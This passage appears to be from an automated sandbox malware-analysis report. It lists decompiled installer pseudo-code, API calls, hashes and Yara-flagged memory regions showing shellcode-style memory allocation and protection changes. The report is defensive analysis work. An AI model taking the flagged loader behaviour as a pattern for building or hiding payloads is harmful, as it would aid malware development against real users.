                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                            • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                            • API String ID: 2035342205-1953461807
                                                                            • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                            • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                                            • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                            • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00406873(WCHAR* _a4) {
                                                                            				void* _t2;
                                                                            
                                                                            				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
                                                                            				if(_t2 == 0xffffffff) {
                                                                            					return 0;
                                                                            				}
                                                                            				FindClose(_t2);
                                                                            				return 0x4302b8;
                                                                            			}





                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(76FA3420,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,76FA3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76FA3420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                                            • FindClose.KERNEL32(00000000), ref: 0040688A
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2295610775-0
                                                                            • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                            • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                                            • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                            • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 02AB906B: LoadLibraryA.KERNELBASE(?,?,?,02AB9EE4,D6B37BD0,-DB19C8CC), ref: 02AB913B
                                                                            • NtAllocateVirtualMemory.NTDLL ref: 02ABA065
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateLibraryLoadMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2616484454-0
                                                                            • Opcode ID: f4ea3af4fdc528bda823b05b2e5818278e1818bef23aa88c83f7b706eaf0f1bd
                                                                            • Instruction ID: 9bf868e7470a9d2b623e76b0b79445d6f65104300c83fbb2a7c93e23bbeab9f6
                                                                            • Opcode Fuzzy Hash: f4ea3af4fdc528bda823b05b2e5818278e1818bef23aa88c83f7b706eaf0f1bd
                                                                            • Instruction Fuzzy Hash: D09105399093919BDB268E3889843CA7FE1FF5A320F084669C9C59F11BD7258589CBC2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • K32EnumDeviceDrivers.KERNEL32(00000001,02ABCCA8), ref: 02ABC5AA
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DeviceDriversEnum
                                                                            • String ID:
                                                                            • API String ID: 22031212-0
                                                                            • Opcode ID: 62c8152af6ff0d964e0fb4a8dcd818b773a5f601e37f241758776b7861d30d47
                                                                            • Instruction ID: 72dd568f957d93b97347bf8a0e78a3276aa3c2a47aa17e9d61b02fb0978649f6
                                                                            • Opcode Fuzzy Hash: 62c8152af6ff0d964e0fb4a8dcd818b773a5f601e37f241758776b7861d30d47
                                                                            • Instruction Fuzzy Hash: 4F11A330644249CFCF2A8E788AD4BEA6777AF99224F10423BC907CB656DB308A41CA10
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtProtectVirtualMemory.NTDLL(-15D5A9F5,?,?,?,?,02ABB073), ref: 02ABBFDE
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MemoryProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 2706961497-0
                                                                            • Opcode ID: b7053776efb50aca0b57ed75faf615849aeebe61085ebdbc2bc630fea3ec9100
                                                                            • Instruction ID: c720da59a1aaed621f40cb919e653f1426d7f5399070f9e0e5d8601a08598f97
                                                                            • Opcode Fuzzy Hash: b7053776efb50aca0b57ed75faf615849aeebe61085ebdbc2bc630fea3ec9100
                                                                            • Instruction Fuzzy Hash: F6018075B006889FDB38CE388C986EE77A7AFD5300F85422EE84A57384CB705A45CB15
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 12a2dbae234d98b52adbb173602d0a197a9c9b5091d48e77cbdc2c357a09e0b4
                                                                            • Instruction ID: 24c0e1f0e167a06f8ac5d7eeedc20fece0c29d4fe1240121b91253627492f0ed
                                                                            • Opcode Fuzzy Hash: 12a2dbae234d98b52adbb173602d0a197a9c9b5091d48e77cbdc2c357a09e0b4
                                                                            • Instruction Fuzzy Hash: 4F11487430D306CEDFA814795AB57BE31B75F62780E88416F8E57832C4DF6885448943
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 84%
                                                                            			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                                            				struct HWND__* _v28;
                                                                            				void* _v84;
                                                                            				void* _v88;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				signed int _t34;
                                                                            				signed int _t36;
                                                                            				signed int _t38;
                                                                            				struct HWND__* _t48;
                                                                            				signed int _t67;
                                                                            				struct HWND__* _t73;
                                                                            				signed int _t86;
                                                                            				struct HWND__* _t91;
                                                                            				signed int _t99;
                                                                            				int _t103;
                                                                            				signed int _t117;
                                                                            				int _t118;
                                                                            				int _t122;
                                                                            				signed int _t124;
                                                                            				struct HWND__* _t127;
                                                                            				struct HWND__* _t128;
                                                                            				int _t129;
                                                                            				intOrPtr _t130;
                                                                            				long _t133;
                                                                            				int _t135;
                                                                            				int _t136;
                                                                            				void* _t137;
                                                                            
                                                                            				_t130 = _a8;
                                                                            				if(_t130 == 0x110 || _t130 == 0x408) {
                                                                            					_t34 = _a12;
                                                                            					_t127 = _a4;
                                                                            					__eflags = _t130 - 0x110;
                                                                            					 *0x42d250 = _t34;
                                                                            					if(_t130 == 0x110) {
                                                                            						 *0x434f08 = _t127;
                                                                            						 *0x42d264 = GetDlgItem(_t127, 1);
                                                                            						_t91 = GetDlgItem(_t127, 2);
                                                                            						_push(0xffffffff);
                                                                            						_push(0x1c);
                                                                            						 *0x42b230 = _t91;
                                                                            						E00404499(_t127);
                                                                            						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
                                                                            						 *0x433ecc = E0040140B(4);
                                                                            						_t34 = 1;
                                                                            						__eflags = 1;
                                                                            						 *0x42d250 = 1;
                                                                            					}
                                                                            					_t124 =  *0x40a368; // 0x0
                                                                            					_t136 = 0;
                                                                            					_t133 = (_t124 << 6) +  *0x434f20;
                                                                            					__eflags = _t124;
                                                                            					if(_t124 < 0) {
                                                                            						L36:
                                                                            						E004044E5(0x40b);
                                                                            						while(1) {
                                                                            							_t36 =  *0x42d250;
                                                                            							 *0x40a368 =  *0x40a368 + _t36;
                                                                            							_t133 = _t133 + (_t36 << 6);
                                                                            							_t38 =  *0x40a368; // 0x0
                                                                            							__eflags = _t38 -  *0x434f24;
                                                                            							if(_t38 ==  *0x434f24) {
                                                                            								E0040140B(1);
                                                                            							}
                                                                            							__eflags =  *0x433ecc - _t136;
                                                                            							if( *0x433ecc != _t136) {
                                                                            								break;
                                                                            							}
                                                                            							__eflags =  *0x40a368 -  *0x434f24; // 0x0
                                                                            							if(__eflags >= 0) {
                                                                            								break;
                                                                            							}
                                                                            							_t117 =  *(_t133 + 0x14);
                                                                            							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
                                                                            							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                                            							_push(0xfffffc19);
                                                                            							E00404499(_t127);
                                                                            							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                                            							_push(0xfffffc1b);
                                                                            							E00404499(_t127);
                                                                            							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                                            							_push(0xfffffc1a);
                                                                            							E00404499(_t127);
                                                                            							_t48 = GetDlgItem(_t127, 3);
                                                                            							__eflags =  *0x434f8c - _t136;
                                                                            							_v28 = _t48;
                                                                            							if( *0x434f8c != _t136) {
                                                                            								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                                            								__eflags = _t117;
                                                                            							}
                                                                            							ShowWindow(_t48, _t117 & 0x00000008); // executed
                                                                            							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
                                                                            							E004044BB(_t117 & 0x00000002);
                                                                            							_t118 = _t117 & 0x00000004;
                                                                            							EnableWindow( *0x42b230, _t118);
                                                                            							__eflags = _t118 - _t136;
                                                                            							if(_t118 == _t136) {
                                                                            								_push(1);
                                                                            							} else {
                                                                            								_push(_t136);
                                                                            							}
                                                                            							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                                            							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                                            							__eflags =  *0x434f8c - _t136;
                                                                            							if( *0x434f8c == _t136) {
                                                                            								_push( *0x42d264);
                                                                            							} else {
                                                                            								SendMessageW(_t127, 0x401, 2, _t136);
                                                                            								_push( *0x42b230);
                                                                            							}
                                                                            							E004044CE();
                                                                            							E0040653D(0x42d268, E00403F7B());
                                                                            							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                                            							SetWindowTextW(_t127, 0x42d268); // executed
                                                                            							_push(_t136);
                                                                            							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                                            							__eflags = _t67;
                                                                            							if(_t67 != 0) {
                                                                            								continue;
                                                                            							} else {
                                                                            								__eflags =  *_t133 - _t136;
                                                                            								if( *_t133 == _t136) {
                                                                            									continue;
                                                                            								}
                                                                            								__eflags =  *(_t133 + 4) - 5;
                                                                            								if( *(_t133 + 4) != 5) {
                                                                            									DestroyWindow( *0x433ed8); // executed
                                                                            									 *0x42c240 = _t133;
                                                                            									__eflags =  *_t133 - _t136;
                                                                            									if( *_t133 <= _t136) {
                                                                            										goto L60;
                                                                            									}
                                                                            									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
                                                                            									__eflags = _t73 - _t136;
                                                                            									 *0x433ed8 = _t73;
                                                                            									if(_t73 == _t136) {
                                                                            										goto L60;
                                                                            									}
                                                                            									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                                            									_push(6);
                                                                            									E00404499(_t73);
                                                                            									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                                            									ScreenToClient(_t127, _t137 + 0x10);
                                                                            									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                                            									_push(_t136);
                                                                            									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                                            									__eflags =  *0x433ecc - _t136;
                                                                            									if( *0x433ecc != _t136) {
                                                                            										goto L63;
                                                                            									}
                                                                            									ShowWindow( *0x433ed8, 8); // executed
                                                                            									E004044E5(0x405);
                                                                            									goto L60;
                                                                            								}
                                                                            								__eflags =  *0x434f8c - _t136;
                                                                            								if( *0x434f8c != _t136) {
                                                                            									goto L63;
                                                                            								}
                                                                            								__eflags =  *0x434f80 - _t136;
                                                                            								if( *0x434f80 != _t136) {
                                                                            									continue;
                                                                            								}
                                                                            								goto L63;
                                                                            							}
                                                                            						}
                                                                            						DestroyWindow( *0x433ed8);
                                                                            						 *0x434f08 = _t136;
                                                                            						EndDialog(_t127,  *0x42ba38);
                                                                            						goto L60;
                                                                            					} else {
                                                                            						__eflags = _t34 - 1;
                                                                            						if(_t34 != 1) {
                                                                            							L35:
                                                                            							__eflags =  *_t133 - _t136;
                                                                            							if( *_t133 == _t136) {
                                                                            								goto L63;
                                                                            							}
                                                                            							goto L36;
                                                                            						}
                                                                            						_push(0);
                                                                            						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                                            						__eflags = _t86;
                                                                            						if(_t86 == 0) {
                                                                            							goto L35;
                                                                            						}
                                                                            						SendMessageW( *0x433ed8, 0x40f, 0, 1);
                                                                            						__eflags =  *0x433ecc;
                                                                            						return 0 |  *0x433ecc == 0x00000000;
                                                                            					}
                                                                            				} else {
                                                                            					_t127 = _a4;
                                                                            					_t136 = 0;
                                                                            					if(_t130 == 0x47) {
                                                                            						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
                                                                            					}
                                                                            					_t122 = _a12;
                                                                            					if(_t130 != 5) {
                                                                            						L8:
                                                                            						if(_t130 != 0x40d) {
                                                                            							__eflags = _t130 - 0x11;
                                                                            							if(_t130 != 0x11) {
                                                                            								__eflags = _t130 - 0x111;
                                                                            								if(_t130 != 0x111) {
                                                                            									goto L28;
                                                                            								}
                                                                            								_t135 = _t122 & 0x0000ffff;
                                                                            								_t128 = GetDlgItem(_t127, _t135);
                                                                            								__eflags = _t128 - _t136;
                                                                            								if(_t128 == _t136) {
                                                                            									L15:
                                                                            									__eflags = _t135 - 1;
                                                                            									if(_t135 != 1) {
                                                                            										__eflags = _t135 - 3;
                                                                            										if(_t135 != 3) {
                                                                            											_t129 = 2;
                                                                            											__eflags = _t135 - _t129;
                                                                            											if(_t135 != _t129) {
                                                                            												L27:
                                                                            												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
                                                                            												goto L28;
                                                                            											}
                                                                            											__eflags =  *0x434f8c - _t136;
                                                                            											if( *0x434f8c == _t136) {
                                                                            												_t99 = E0040140B(3);
                                                                            												__eflags = _t99;
                                                                            												if(_t99 != 0) {
                                                                            													goto L28;
                                                                            												}
                                                                            												 *0x42ba38 = 1;
                                                                            												L23:
                                                                            												_push(0x78);
                                                                            												L24:
                                                                            												E00404472();
                                                                            												goto L28;
                                                                            											}
                                                                            											E0040140B(_t129);
                                                                            											 *0x42ba38 = _t129;
                                                                            											goto L23;
                                                                            										}
                                                                            										__eflags =  *0x40a368 - _t136; // 0x0
                                                                            										if(__eflags <= 0) {
                                                                            											goto L27;
                                                                            										}
                                                                            										_push(0xffffffff);
                                                                            										goto L24;
                                                                            									}
                                                                            									_push(_t135);
                                                                            									goto L24;
                                                                            								}
                                                                            								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                                            								_t103 = IsWindowEnabled(_t128);
                                                                            								__eflags = _t103;
                                                                            								if(_t103 == 0) {
                                                                            									L63:
                                                                            									return 0;
                                                                            								}
                                                                            								goto L15;
                                                                            							}
                                                                            							SetWindowLongW(_t127, _t136, _t136);
                                                                            							return 1;
                                                                            						}
                                                                            						DestroyWindow( *0x433ed8);
                                                                            						 *0x433ed8 = _t122;
                                                                            						L60:
                                                                            						if( *0x42f268 == _t136 &&  *0x433ed8 != _t136) {
                                                                            							ShowWindow(_t127, 0xa); // executed
                                                                            							 *0x42f268 = 1;
                                                                            						}
                                                                            						goto L63;
                                                                            					} else {
                                                                            						asm("sbb eax, eax");
                                                                            						ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
                                                                            						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                                            							L28:
                                                                            							return E00404500(_a8, _t122, _a16);
                                                                            						} else {
                                                                            							ShowWindow(_t127, 4);
                                                                            							goto L8;
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            			}































                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004041c0
                                                                            0x0040418d
                                                                            0x00404191
                                                                            0x00404196
                                                                            0x00404198
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004041a8
                                                                            0x004041b0
                                                                            0x00000000
                                                                            0x004041b6
                                                                            0x00403fbe
                                                                            0x00403fbe
                                                                            0x00403fc2
                                                                            0x00403fc7
                                                                            0x00403fd6
                                                                            0x00403fd6
                                                                            0x00403fdc
                                                                            0x00403fe3
                                                                            0x00404027
                                                                            0x0040402d
                                                                            0x00404046
                                                                            0x00404049
                                                                            0x0040405c
                                                                            0x00404062
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404068
                                                                            0x00404073
                                                                            0x00404075
                                                                            0x00404077
                                                                            0x00404096
                                                                            0x00404096
                                                                            0x00404099
                                                                            0x0040409e
                                                                            0x004040a1
                                                                            0x004040b1
                                                                            0x004040b2
                                                                            0x004040b4
                                                                            0x004040ea
                                                                            0x004040fa
                                                                            0x00000000
                                                                            0x004040fa
                                                                            0x004040b6
                                                                            0x004040bc
                                                                            0x004040d5
                                                                            0x004040da
                                                                            0x004040dc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004040de
                                                                            0x004040ca
                                                                            0x004040ca
                                                                            0x004040cc
                                                                            0x004040cc
                                                                            0x00000000
                                                                            0x004040cc
                                                                            0x004040bf
                                                                            0x004040c4
                                                                            0x00000000
                                                                            0x004040c4
                                                                            0x004040a3
                                                                            0x004040a9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004040ab
                                                                            0x00000000
                                                                            0x004040ab
                                                                            0x0040409b
                                                                            0x00000000
                                                                            0x0040409b
                                                                            0x00404081
                                                                            0x00404088
                                                                            0x0040408e
                                                                            0x00404090
                                                                            0x00404466
                                                                            0x00000000
                                                                            0x00404466
                                                                            0x00000000
                                                                            0x00404090
                                                                            0x0040404e
                                                                            0x00000000
                                                                            0x00404056
                                                                            0x00404035
                                                                            0x0040403b
                                                                            0x00404443
                                                                            0x00404449
                                                                            0x00404456
                                                                            0x0040445c
                                                                            0x0040445c
                                                                            0x00000000
                                                                            0x00403fe5
                                                                            0x00403fea
                                                                            0x00403ff6
                                                                            0x00403fff
                                                                            0x00404100
                                                                            0x00000000
                                                                            0x0040401e
                                                                            0x00404021
                                                                            0x00000000
                                                                            0x00404021
                                                                            0x00403fff
                                                                            0x00403fe3

                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                                            • ShowWindow.USER32(?), ref: 00403FF6
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                                            • ShowWindow.USER32(?,00000004), ref: 00404021
                                                                            • DestroyWindow.USER32 ref: 00404035
                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                                                                            • GetDlgItem.USER32(?,?), ref: 0040406D
                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                                            • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                                            • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                                            • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                                            • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                                            • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                                            • EnableWindow.USER32(?,?), ref: 0040429C
                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                                                            • EnableMenuItem.USER32(00000000), ref: 004042B9
                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                                            • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                                            • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                                                            • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                            • String ID:
                                                                            • API String ID: 121052019-0
                                                                            • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                            • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                                            • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                            • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            [Figure: control-flow graph for the function at 0x403BEC; nodes are marked as executed or not executed]
                                                                            C-Code - Quality: 96%
                                                                            			E00403BEC(void* __eflags) {
                                                                            				intOrPtr _v4;
                                                                            				intOrPtr _v8;
                                                                            				int _v12;
                                                                            				void _v16;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				intOrPtr* _t22;
                                                                            				void* _t30;
                                                                            				void* _t32;
                                                                            				int _t33;
                                                                            				void* _t36;
                                                                            				int _t39;
                                                                            				int _t40;
                                                                            				int _t44;
                                                                            				short _t63;
                                                                            				WCHAR* _t65;
                                                                            				signed char _t69;
                                                                            				WCHAR* _t76;
                                                                            				intOrPtr _t82;
                                                                            				WCHAR* _t87;
                                                                            
                                                                            				_t82 =  *0x434f10;
                                                                            				_t22 = E0040690A(2);
                                                                            				_t90 = _t22;
                                                                            				if(_t22 == 0) {
                                                                            					_t76 = 0x42d268;
                                                                            					L"1033" = 0x30;
                                                                            					 *0x442002 = 0x78;
                                                                            					 *0x442004 = 0;
                                                                            					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
                                                                            					__eflags =  *0x42d268;
                                                                            					if(__eflags == 0) {
                                                                            						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
                                                                            					}
                                                                            					lstrcatW(L"1033", _t76);
                                                                            				} else {
                                                                            					E00406484(L"1033",  *_t22() & 0x0000ffff);
                                                                            				}
                                                                            				E00403EC2(_t78, _t90);
                                                                            				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp";
                                                                            				 *0x434f80 =  *0x434f18 & 0x00000020;
                                                                            				 *0x434f9c = 0x10000;
                                                                            				if(E00405F14(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Temp") != 0) {
                                                                            					L16:
                                                                            					if(E00405F14(_t98, _t86) == 0) {
                                                                            						E0040657A(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                                                            					}
                                                                            					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
                                                                            					 *0x433ee8 = _t30;
                                                                            					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                                            						L21:
                                                                            						if(E0040140B(0) == 0) {
                                                                            							_t32 = E00403EC2(_t78, __eflags);
                                                                            							__eflags =  *0x434fa0;
                                                                            							if( *0x434fa0 != 0) {
                                                                            								_t33 = E00405672(_t32, 0);
                                                                            								__eflags = _t33;
                                                                            								if(_t33 == 0) {
                                                                            									E0040140B(1);
                                                                            									goto L33;
                                                                            								}
                                                                            								__eflags =  *0x433ecc;
                                                                            								if( *0x433ecc == 0) {
                                                                            									E0040140B(2);
                                                                            								}
                                                                            								goto L22;
                                                                            							}
                                                                            							ShowWindow( *0x42d248, 5); // executed
                                                                            							_t39 = E0040689A("RichEd20"); // executed
                                                                            							__eflags = _t39;
                                                                            							if(_t39 == 0) {
                                                                            								E0040689A("RichEd32");
                                                                            							}
                                                                            							_t87 = L"RichEdit20W";
                                                                            							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
                                                                            							__eflags = _t40;
                                                                            							if(_t40 == 0) {
                                                                            								GetClassInfoW(0, L"RichEdit", 0x433ea0);
                                                                            								 *0x433ec4 = _t87;
                                                                            								RegisterClassW(0x433ea0);
                                                                            							}
                                                                            							_t44 = DialogBoxParamW( *0x434f00,  *0x433ee0 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
                                                                            							E00403B3C(E0040140B(5), 1);
                                                                            							return _t44;
                                                                            						}
                                                                            						L22:
                                                                            						_t36 = 2;
                                                                            						return _t36;
                                                                            					} else {
                                                                            						_t78 =  *0x434f00;
                                                                            						 *0x433ea4 = E00401000;
                                                                            						 *0x433eb0 =  *0x434f00;
                                                                            						 *0x433eb4 = _t30;
                                                                            						 *0x433ec4 = 0x40a380;
                                                                            						if(RegisterClassW(0x433ea0) == 0) {
                                                                            							L33:
                                                                            							__eflags = 0;
                                                                            							return 0;
                                                                            						}
                                                                            						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                            						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
                                                                            						goto L21;
                                                                            					}
                                                                            				} else {
                                                                            					_t78 =  *(_t82 + 0x48);
                                                                            					_t92 = _t78;
                                                                            					if(_t78 == 0) {
                                                                            						goto L16;
                                                                            					}
                                                                            					_t76 = 0x432ea0;
                                                                            					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
                                                                            					_t63 =  *0x432ea0; // 0x43
                                                                            					if(_t63 == 0) {
                                                                            						goto L16;
                                                                            					}
                                                                            					if(_t63 == 0x22) {
                                                                            						_t76 = 0x432ea2;
                                                                            						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
                                                                            					}
                                                                            					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
